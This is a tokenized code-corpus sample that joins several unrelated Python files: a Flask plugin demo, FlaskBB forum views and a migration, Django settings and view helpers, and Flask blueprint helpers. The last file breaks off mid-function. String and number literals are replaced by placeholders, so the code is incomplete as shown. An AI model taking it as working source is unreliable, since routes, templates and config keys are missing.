<s> from flask import Flask , render_template , redirect , url_for , current_app <EOL> from flask_plugins import PluginManager , get_enabled_plugins , get_plugin , Plugin , emit_event <EOL> class AppPlugin ( Plugin ) : <EOL> def register_blueprint ( self , blueprint , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> current_app . register_blueprint ( blueprint , ** kwargs ) <EOL> SECRET_KEY = "<STR_LIT>" <EOL> app = Flask ( __name__ ) <EOL> app . config . from_object ( __name__ ) <EOL> plugin_manager = PluginManager ( app ) <EOL> @ app . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> emit_event ( "<STR_LIT>" ) <EOL> return render_template ( "<STR_LIT>" , plugins = get_enabled_plugins ( ) ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def disable ( plugin ) : <EOL> plugin = get_plugin ( plugin ) <EOL> plugin_manager . disable_plugins ( [ plugin ] ) <EOL> return redirect ( url_for ( "<STR_LIT:index>" ) ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def enable ( plugin ) : <EOL> plugin = get_plugin ( plugin ) <EOL> plugin_manager . enable_plugins ( [ plugin ] ) <EOL> return redirect ( url_for ( "<STR_LIT:index>" ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app . run ( debug = True ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> from sqlalchemy import asc , desc <EOL> from flask import Blueprint , redirect , url_for , current_app , request , flash <EOL> from flask_login import login_required , current_user <EOL> from flask_babelplus import gettext as _ <EOL> from flask_allows import Permission , And <EOL> from flaskbb . extensions import db , allows <EOL> from flaskbb . utils . settings import flaskbb_config <EOL> from flaskbb . utils . helpers import ( <EOL> get_online_users , time_diff , format_quote , render_template , do_topic_action <EOL> ) <EOL> from flaskbb . utils . requirements import ( <EOL> CanAccessForum , <EOL> CanAccessTopic , <EOL> CanDeletePost , <EOL> CanDeleteTopic , <EOL> CanEditPost , <EOL> CanPostReply , <EOL> CanPostTopic , <EOL> IsAtleastModeratorInForum , <EOL> ) <EOL> from flaskbb . forum . models import ( <EOL> Category , Forum , Topic , Post , ForumsRead , TopicsRead <EOL> ) <EOL> from flaskbb . forum . forms import ( <EOL> NewTopicForm , <EOL> QuickreplyForm , <EOL> ReplyForm , <EOL> ReportForm , <EOL> SearchPageForm , <EOL> UserSearchForm , <EOL> ) <EOL> from flaskbb . user . models import User <EOL> forum = Blueprint ( "<STR_LIT>" , __name__ ) <EOL> @ forum . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> categories = Category . get_all ( user = current_user ) <EOL> user_count = User . query . count ( ) <EOL> topic_count = Topic . query . count ( ) <EOL> post_count = Post . query . count ( ) <EOL> newest_user = User . query . order_by ( User . id . desc ( ) ) . first ( ) <EOL> if not current_app . config [ "<STR_LIT>" ] : <EOL> online_users = User . query . filter ( User . lastseen >= time_diff ( ) ) . count ( ) <EOL> online_guests = None <EOL> else : <EOL> online_users = len ( get_online_users ( ) ) <EOL> online_guests = len ( get_online_users ( guest = True ) ) <EOL> return render_template ( "<STR_LIT>" , <EOL> categories = categories , <EOL> user_count = user_count , <EOL> topic_count = topic_count , <EOL> post_count = post_count , <EOL> newest_user = newest_user , <EOL> online_users = online_users , <EOL> online_guests = online_guests ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> def view_category ( category_id , slug = None ) : <EOL> category , forums = Category . get_forums ( category_id = category_id , user = current_user ) <EOL> return render_template ( "<STR_LIT>" , forums = forums , <EOL> category = category ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> @ allows . requires ( CanAccessForum ( ) ) <EOL> def view_forum ( forum_id , slug = None ) : <EOL> page = request . args . get ( '<STR_LIT>' , <NUM_LIT:1> , type = int ) <EOL> forum_instance , forumsread = Forum . get_forum ( <EOL> forum_id = forum_id , user = current_user <EOL> ) <EOL> if forum_instance . external : <EOL> return redirect ( forum_instance . external ) <EOL> topics = Forum . get_topics ( <EOL> forum_id = forum_instance . id , user = current_user , page = page , <EOL> per_page = flaskbb_config [ "<STR_LIT>" ] <EOL> ) <EOL> return render_template ( <EOL> "<STR_LIT>" , forum = forum_instance , <EOL> topics = topics , forumsread = forumsread , <EOL> ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ allows . requires ( CanAccessTopic ( ) ) <EOL> def view_topic ( topic_id , slug = None ) : <EOL> page = request . args . get ( '<STR_LIT>' , <NUM_LIT:1> , type = int ) <EOL> topic = Topic . get_topic ( topic_id = topic_id , user = current_user ) <EOL> topic . views += <NUM_LIT:1> <EOL> topic . save ( ) <EOL> posts = Post . query . join ( User , Post . user_id == User . id ) . filter ( Post . topic_id == topic . id ) . add_entity ( User ) . order_by ( Post . id . asc ( ) ) . paginate ( page , flaskbb_config [ '<STR_LIT>' ] , False ) <EOL> forumsread = None <EOL> if current_user . is_authenticated : <EOL> forumsread = ForumsRead . query . filter_by ( user_id = current_user . id , <EOL> forum_id = topic . forum . id ) . first ( ) <EOL> topic . update_read ( current_user , topic . forum , forumsread ) <EOL> form = None <EOL> if Permission ( CanPostReply ) : <EOL> form = QuickreplyForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> post = form . save ( current_user , topic ) <EOL> return view_post ( post . id ) <EOL> return render_template ( "<STR_LIT>" , topic = topic , posts = posts , <EOL> last_seen = time_diff ( ) , form = form ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> def view_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> count = post . topic . post_count <EOL> page = count / flaskbb_config [ "<STR_LIT>" ] <EOL> if count > flaskbb_config [ "<STR_LIT>" ] : <EOL> page += <NUM_LIT:1> <EOL> else : <EOL> page = <NUM_LIT:1> <EOL> return redirect ( post . topic . url + "<STR_LIT>" % ( page , post . id ) ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def new_topic ( forum_id , slug = None ) : <EOL> forum_instance = Forum . query . filter_by ( id = forum_id ) . first_or_404 ( ) <EOL> if not Permission ( CanPostTopic ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( forum_instance . url ) <EOL> form = NewTopicForm ( ) <EOL> if request . method == "<STR_LIT:POST>" : <EOL> if "<STR_LIT>" in request . form and form . validate ( ) : <EOL> return render_template ( <EOL> "<STR_LIT>" , forum = forum_instance , <EOL> form = form , preview = form . content . data <EOL> ) <EOL> if "<STR_LIT>" in request . form and form . validate ( ) : <EOL> topic = form . save ( current_user , forum_instance ) <EOL> return redirect ( url_for ( '<STR_LIT>' , topic_id = topic . id ) ) <EOL> return render_template ( <EOL> "<STR_LIT>" , forum = forum_instance , form = form <EOL> ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def delete_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( CanDeleteTopic ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . forum . url ) <EOL> involved_users = User . query . filter ( Post . topic_id == topic . id , <EOL> User . id == Post . user_id ) . all ( ) <EOL> topic . delete ( users = involved_users ) <EOL> return redirect ( url_for ( "<STR_LIT>" , forum_id = topic . forum_id ) ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def lock_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = topic . forum ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . url ) <EOL> topic . locked = True <EOL> topic . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def unlock_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = topic . forum ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . url ) <EOL> topic . locked = False <EOL> topic . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def highlight_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = topic . forum ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . url ) <EOL> topic . important = True <EOL> topic . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def trivialize_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = topic . forum ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . url ) <EOL> topic . important = False <EOL> topic . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def manage_forum ( forum_id , slug = None ) : <EOL> page = request . args . get ( '<STR_LIT>' , <NUM_LIT:1> , type = int ) <EOL> forum_instance , forumsread = Forum . get_forum ( forum_id = forum_id , <EOL> user = current_user ) <EOL> available_forums = Forum . query . order_by ( Forum . position ) . all ( ) <EOL> available_forums . remove ( forum_instance ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = forum_instance ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( forum_instance . url ) <EOL> if forum_instance . external : <EOL> return redirect ( forum_instance . external ) <EOL> topics = Forum . get_topics ( <EOL> forum_id = forum_instance . id , user = current_user , page = page , <EOL> per_page = flaskbb_config [ "<STR_LIT>" ] <EOL> ) <EOL> mod_forum_url = url_for ( "<STR_LIT>" , forum_id = forum_instance . id , <EOL> slug = forum_instance . slug ) <EOL> if request . method == "<STR_LIT:POST>" : <EOL> ids = request . form . getlist ( "<STR_LIT>" ) <EOL> tmp_topics = Topic . query . filter ( Topic . id . in_ ( ids ) ) . all ( ) <EOL> if not len ( tmp_topics ) > <NUM_LIT:0> : <EOL> flash ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> return redirect ( mod_forum_url ) <EOL> if "<STR_LIT>" in request . form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = False ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = True ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = False ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = True ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = False ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . form : <EOL> new_forum_id = request . form . get ( "<STR_LIT>" ) <EOL> if not new_forum_id : <EOL> flash ( _ ( "<STR_LIT>" ) , "<STR_LIT:info>" ) <EOL> return redirect ( mod_forum_url ) <EOL> new_forum = Forum . query . filter_by ( id = new_forum_id ) . first_or_404 ( ) <EOL> if not Permission ( <EOL> And ( <EOL> IsAtleastModeratorInForum ( forum_id = new_forum_id ) , <EOL> IsAtleastModeratorInForum ( forum = forum_instance ) <EOL> ) <EOL> ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( mod_forum_url ) <EOL> new_forum . move_topics_to ( tmp_topics ) <EOL> return redirect ( mod_forum_url ) <EOL> return render_template ( <EOL> "<STR_LIT>" , forum = forum_instance , topics = topics , <EOL> available_forums = available_forums , forumsread = forumsread , <EOL> ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def new_post ( topic_id , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( CanPostReply ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . forum . url ) <EOL> form = ReplyForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> if "<STR_LIT>" in request . form : <EOL> return render_template ( <EOL> "<STR_LIT>" , topic = topic , <EOL> form = form , preview = form . content . data <EOL> ) <EOL> else : <EOL> post = form . save ( current_user , topic ) <EOL> return view_post ( post . id ) <EOL> return render_template ( "<STR_LIT>" , topic = topic , form = form ) <EOL> @ forum . route ( <EOL> "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] <EOL> ) <EOL> @ login_required <EOL> def reply_post ( topic_id , post_id ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> if not Permission ( CanPostReply ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . forum . url ) <EOL> form = ReplyForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> if "<STR_LIT>" in request . form : <EOL> return render_template ( <EOL> "<STR_LIT>" , topic = topic , <EOL> form = form , preview = form . content . data <EOL> ) <EOL> else : <EOL> form . save ( current_user , topic ) <EOL> return redirect ( post . topic . url ) <EOL> else : <EOL> form . content . data = format_quote ( post . username , post . content ) <EOL> return render_template ( "<STR_LIT>" , topic = post . topic , form = form ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def edit_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> if not Permission ( CanEditPost ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( post . topic . url ) <EOL> form = ReplyForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> if "<STR_LIT>" in request . form : <EOL> return render_template ( <EOL> "<STR_LIT>" , topic = post . topic , <EOL> form = form , preview = form . content . data <EOL> ) <EOL> else : <EOL> form . populate_obj ( post ) <EOL> post . date_modified = datetime . datetime . utcnow ( ) <EOL> post . modified_by = current_user . username <EOL> post . save ( ) <EOL> return redirect ( post . topic . url ) <EOL> else : <EOL> form . content . data = post . content <EOL> return render_template ( "<STR_LIT>" , topic = post . topic , form = form ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def delete_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> if not Permission ( CanDeletePost ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( post . topic . url ) <EOL> first_post = post . first_post <EOL> topic_url = post . topic . url <EOL> forum_url = post . topic . forum . url <EOL> post . delete ( ) <EOL> if first_post : <EOL> return redirect ( forum_url ) <EOL> return redirect ( topic_url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:GET>" , "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def report_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> form = ReportForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> form . save ( current_user , post ) <EOL> flash ( _ ( "<STR_LIT>" ) , "<STR_LIT:success>" ) <EOL> return render_template ( "<STR_LIT>" , form = form ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def raw_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> return format_quote ( username = post . username , content = post . content ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def markread ( forum_id = None , slug = None ) : <EOL> if forum_id : <EOL> forum_instance = Forum . query . filter_by ( id = forum_id ) . first_or_404 ( ) <EOL> forumsread = ForumsRead . query . filter_by ( <EOL> user_id = current_user . id , forum_id = forum_instance . id <EOL> ) . first ( ) <EOL> TopicsRead . query . filter_by ( user_id = current_user . id , <EOL> forum_id = forum_instance . id ) . delete ( ) <EOL> if not forumsread : <EOL> forumsread = ForumsRead ( ) <EOL> forumsread . user_id = current_user . id <EOL> forumsread . forum_id = forum_instance . id <EOL> forumsread . last_read = datetime . datetime . utcnow ( ) <EOL> forumsread . cleared = datetime . datetime . utcnow ( ) <EOL> db . session . add ( forumsread ) <EOL> db . session . commit ( ) <EOL> flash ( _ ( "<STR_LIT>" , forum = forum_instance . title ) , <EOL> "<STR_LIT:success>" ) <EOL> return redirect ( forum_instance . url ) <EOL> ForumsRead . query . filter_by ( user_id = current_user . id ) . delete ( ) <EOL> TopicsRead . query . filter_by ( user_id = current_user . id ) . delete ( ) <EOL> forums = Forum . query . all ( ) <EOL> forumsread_list = [ ] <EOL> for forum_instance in forums : <EOL> forumsread = ForumsRead ( ) <EOL> forumsread . user_id = current_user . id <EOL> forumsread . forum_id = forum_instance . id <EOL> forumsread . last_read = datetime . datetime . utcnow ( ) <EOL> forumsread . cleared = datetime . datetime . utcnow ( ) <EOL> forumsread_list . append ( forumsread ) <EOL> db . session . add_all ( forumsread_list ) <EOL> db . session . commit ( ) <EOL> flash ( _ ( "<STR_LIT>" ) , "<STR_LIT:success>" ) <EOL> return redirect ( url_for ( "<STR_LIT>" ) ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> def who_is_online ( ) : <EOL> if current_app . config [ '<STR_LIT>' ] : <EOL> online_users = get_online_users ( ) <EOL> else : <EOL> online_users = User . query . filter ( User . lastseen >= time_diff ( ) ) . all ( ) <EOL> return render_template ( "<STR_LIT>" , <EOL> online_users = online_users ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def memberlist ( ) : <EOL> page = request . args . get ( '<STR_LIT>' , <NUM_LIT:1> , type = int ) <EOL> sort_by = request . args . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> order_by = request . args . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sort_obj = None <EOL> order_func = None <EOL> if order_by == '<STR_LIT>' : <EOL> order_func = asc <EOL> else : <EOL> order_func = desc <EOL> if sort_by == '<STR_LIT>' : <EOL> sort_obj = User . id <EOL> elif sort_by == '<STR_LIT>' : <EOL> sort_obj = User . post_count <EOL> else : <EOL> sort_obj = User . username <EOL> search_form = UserSearchForm ( ) <EOL> if search_form . validate ( ) : <EOL> users = search_form . get_results ( ) . paginate ( page , flaskbb_config [ '<STR_LIT>' ] , False ) <EOL> return render_template ( "<STR_LIT>" , users = users , <EOL> search_form = search_form ) <EOL> else : <EOL> users = User . query . order_by ( order_func ( sort_obj ) ) . paginate ( page , flaskbb_config [ '<STR_LIT>' ] , False ) <EOL> return render_template ( "<STR_LIT>" , users = users , <EOL> search_form = search_form ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> @ login_required <EOL> def topictracker ( ) : <EOL> page = request . args . get ( "<STR_LIT>" , <NUM_LIT:1> , type = int ) <EOL> topics = current_user . tracked_topics . outerjoin ( TopicsRead , <EOL> db . and_ ( TopicsRead . topic_id == Topic . id , <EOL> TopicsRead . user_id == current_user . id ) ) . add_entity ( TopicsRead ) . order_by ( Topic . last_updated . desc ( ) ) . paginate ( page , flaskbb_config [ '<STR_LIT>' ] , True ) <EOL> return render_template ( "<STR_LIT>" , topics = topics ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def track_topic ( topic_id , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> current_user . track_topic ( topic ) <EOL> current_user . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def untrack_topic ( topic_id , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> current_user . untrack_topic ( topic ) <EOL> current_user . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def search ( ) : <EOL> form = SearchPageForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> result = form . get_results ( ) <EOL> return render_template ( '<STR_LIT>' , form = form , <EOL> result = result ) <EOL> return render_template ( '<STR_LIT>' , form = form ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> import sqlalchemy_utils <EOL> def upgrade ( ) : <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:id>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sqlalchemy_utils . types . uuid . UUIDType ( binary = <NUM_LIT:16> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) <EOL> ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:id>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) <EOL> ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> def downgrade ( ) : <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:id>' , sa . INTEGER ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . INTEGER ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . INTEGER ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . INTEGER ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . VARCHAR ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . TEXT ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DATETIME ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . BOOLEAN ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . BOOLEAN ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . BOOLEAN ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ u'<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ u'<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ u'<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) <EOL> ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) </s>
<s> from django . conf import settings <EOL> STAFF_ONLY = getattr ( settings , '<STR_LIT>' , False ) <EOL> DEFAULT_LIST_ID = getattr ( settings , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> DEFAULT_ASSIGNEE = getattr ( settings , '<STR_LIT>' , None ) <EOL> PUBLIC_SUBMIT_REDIRECT = getattr ( settings , '<STR_LIT>' , '<STR_LIT:/>' ) </s>
<s> import django <EOL> if django . get_version ( ) >= '<STR_LIT>' : <EOL> from django . template . loader import render_to_string <EOL> else : <EOL> from django . template import loader , RequestContext <EOL> def render_to_string ( template_name , context = None , request = None ) : <EOL> context_instance = RequestContext ( request ) if request else None <EOL> return loader . render_to_string ( <EOL> template_name , context , context_instance ) <EOL> from . import http <EOL> def temporary_unavailable ( request , template_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> context = { <EOL> '<STR_LIT>' : request . path , <EOL> } <EOL> return http . HttpResponseTemporaryUnavailable ( <EOL> render_to_string ( template_name , context ) ) </s>
<s> import pkgutil <EOL> import importlib <EOL> from flask import Blueprint <EOL> from flask . json import JSONEncoder as BaseJSONEncoder <EOL> def register_blueprints ( app , package_name , package_path ) : <EOL> """<STR_LIT>""" <EOL> rv = [ ] <EOL> for _ , name , _ in pkgutil . iter_modules ( package_path ) : <EOL> m = importlib . import_module ( '<STR_LIT>' % ( package_name , name ) ) <EOL> for item in dir ( m ) : <EOL> item = getattr ( m , item ) <EOL> if isinstance ( item , Blueprint ) : <EOL> app . register_blueprint ( item ) <EOL> rv . append ( item ) <EOL> return rv <EOL> class JSONEncoder ( BaseJSONEncoder ) : <EOL> """<STR_LIT>""" <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , JsonSerializer ) : <EOL> return obj . to_json ( ) <EOL> return super ( JSONEncoder , self ) . default ( obj ) <EOL> class JsonSerializer ( object ) : <EOL> """<STR_LIT>""" <EOL> __json_public__ = None <EOL> __json_hidden__ = None <EOL> __json_modifiers__ = None <EOL> def get_field_names ( self ) : <EOL> for p in self . __mapper__ . iterate_properties : <EOL> yield p . key <EOL> def to_json ( self ) : <EOL> field_names = self . get_field_names ( ) <EOL> public = self . __json_public__ or field_names <EOL> 